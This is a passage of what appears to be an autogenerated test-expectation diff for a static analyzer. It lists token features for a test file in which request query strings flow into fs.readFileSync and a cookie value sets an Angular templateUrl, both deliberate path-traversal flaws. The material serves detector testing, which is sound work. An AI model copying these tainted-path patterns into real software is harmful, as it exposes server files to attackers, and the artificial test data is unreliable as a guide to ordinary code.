autogenerated/TaintedPath/TaintedPath.js:66:13:66:31 | templateUrl: "SAFE" | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:31 | templateUrl: "SAFE" | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:31 | templateUrl: "SAFE" | enclosingFunctionBody | templateUrl SAFE | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:31 | templateUrl: "SAFE" | enclosingFunctionBody | templateUrl SAFE | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:31 | templateUrl: "SAFE" | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:31 | templateUrl: "SAFE" | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:31 | templateUrl: "SAFE" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:66:13:66:31 | templateUrl: "SAFE" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:66:26:66:31 | "SAFE" | assignedToPropName | templateUrl | +| autogenerated/TaintedPath/TaintedPath.js:66:26:66:31 | "SAFE" | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:66:26:66:31 | "SAFE" | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:66:26:66:31 | "SAFE" | enclosingFunctionBody | templateUrl SAFE | +| autogenerated/TaintedPath/TaintedPath.js:66:26:66:31 | "SAFE" | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:66:26:66:31 | "SAFE" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:69:6:69:14 | directive | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:69:6:69:14 | directive | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:69:6:69:14 | directive | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:69:16:69:27 | 'myCustomer' | CalleeFlexibleAccessPath | angular.module().directive().directive | | autogenerated/TaintedPath/TaintedPath.js:69:16:69:27 | 'myCustomer' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:69:16:69:27 | 'myCustomer' | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:69:16:69:27 | 'myCustomer' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/TaintedPath.js:69:16:69:27 | 'myCustomer' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:69:30:69:29 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:69:30:69:29 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:69:30:69:29 | this | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:69:30:69:29 | this | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:69:30:69:29 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | 'arguments' object of anonymous function | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | 'arguments' object of anonymous function | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | exceptional return of anonymous function | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | exceptional return of anonymous function | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | functio ... }\\n } | CalleeFlexibleAccessPath | angular.module().directive().directive | | autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | functio ... }\\n } | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | functio ... }\\n } | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | functio ... }\\n } | contextSurroundingFunctionParameters | () | | autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | functio ... }\\n } | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | return of anonymous function | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | return of anonymous function | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:69:30:73:5 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:70:16:72:9 | {\\n ... } | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:70:16:72:9 | {\\n ... } | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:70:16:72:9 | {\\n ... } | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:70:16:72:9 | {\\n ... } | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:70:16:72:9 | {\\n ... } | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:23 | templateUrl | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:23 | templateUrl | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:23 | templateUrl | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:23 | templateUrl | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:23 | templateUrl | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:45 | templat ... nsafe") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:45 | templat ... nsafe") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:45 | templat ... nsafe") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:45 | templat ... nsafe") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:45 | templat ... nsafe") | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:45 | templat ... nsafe") | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:45 | templat ... nsafe") | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:45 | templat ... nsafe") | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:45 | templat ... nsafe") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:71:13:71:45 | templat ... nsafe") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:31 | Cookie | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:31 | Cookie | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:31 | Cookie | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:31 | Cookie | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:31 | Cookie | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:35 | Cookie.get | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:35 | Cookie.get | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:35 | Cookie.get | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:35 | Cookie.get | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:35 | Cookie.get | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:45 | Cookie.get("unsafe") | assignedToPropName | templateUrl | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:45 | Cookie.get("unsafe") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:45 | Cookie.get("unsafe") | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:45 | Cookie.get("unsafe") | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:45 | Cookie.get("unsafe") | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:45 | Cookie.get("unsafe") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:45 | exceptional return of Cookie.get("unsafe") | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:45 | exceptional return of Cookie.get("unsafe") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:45 | exceptional return of Cookie.get("unsafe") | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:45 | exceptional return of Cookie.get("unsafe") | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:71:26:71:45 | exceptional return of Cookie.get("unsafe") | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:71:33:71:35 | get | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:71:33:71:35 | get | contextSurroundingFunctionParameters | () | +| autogenerated/TaintedPath/TaintedPath.js:71:33:71:35 | get | enclosingFunctionBody | templateUrl Cookie get unsafe | +| autogenerated/TaintedPath/TaintedPath.js:71:33:71:35 | get | enclosingFunctionName | directive#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:71:33:71:35 | get | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:71:37:71:44 | "unsafe" | CalleeFlexibleAccessPath | Cookie.get | | autogenerated/TaintedPath/TaintedPath.js:71:37:71:44 | "unsafe" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:71:37:71:44 | "unsafe" | contextFunctionInterfaces | views_local(req, res) | @@ -5300,6 +60556,52 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:71:37:71:44 | "unsafe" | enclosingFunctionName | directive#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:71:37:71:44 | "unsafe" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:71:37:71:44 | "unsafe" | receiverName | Cookie | +| autogenerated/TaintedPath/TaintedPath.js:75:5:75:10 | server | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:5:75:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:5:75:10 | server | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:5:80:2 | server ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:5:80:2 | server ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:5:80:2 | server ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:14:75:17 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:14:75:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:14:75:17 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:14:75:30 | http.createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:14:75:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:14:75:30 | http.createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:14:80:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:14:80:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:14:80:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:14:80:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:14:80:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:14:80:2 | http.cr ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:19:75:30 | createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:19:75:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:19:75:30 | createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | fs | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | require | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | this | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:75:32:75:31 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | functio ... OT OK\\n} | calleeImports | http | @@ -5307,6 +60609,71 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | functio ... OT OK\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | return of anonymous function | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:75:32:80:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:41:75:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:41:75:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:41:75:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:41:75:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:41:75:43 | req | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:75:41:75:43 | req | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:75:41:75:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:75:41:75:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:75:41:75:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:41:75:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:46:75:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:46:75:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:46:75:48 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:75:46:75:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:75:46:75:48 | res | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:75:46:75:48 | res | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:75:46:75:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:75:46:75:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:75:46:75:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:75:46:75:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:7 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:7 | res | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:7 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:7 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:13 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:13 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:13 | res.write | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:13 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:13 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:78 | exceptional return of res.wri ... query)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:78 | exceptional return of res.wri ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:78 | exceptional return of res.wri ... query)) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:78 | exceptional return of res.wri ... query)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:78 | exceptional return of res.wri ... query)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:78 | res.wri ... query)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:78 | res.wri ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:78 | res.wri ... query)) | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:78 | res.wri ... query)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:5:77:78 | res.wri ... query)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:9:77:13 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:9:77:13 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:9:77:13 | write | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:9:77:13 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:9:77:13 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:16 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:16 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:16 | fs | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:16 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:16 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:29 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:29 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:29 | fs.readFileSync | enclosingFunctionBody | req res res write fs readFileSync require querystringify parse req url query res write fs readFileSync require query-string parse req url query res write fs readFileSync require querystring parse req url query | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:29 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:29 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:77 | exceptional return of fs.read ... .query) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:77:15:77:77 | exceptional return of fs.read ... .query) | contextSurroundingFunctionParameters | | +| 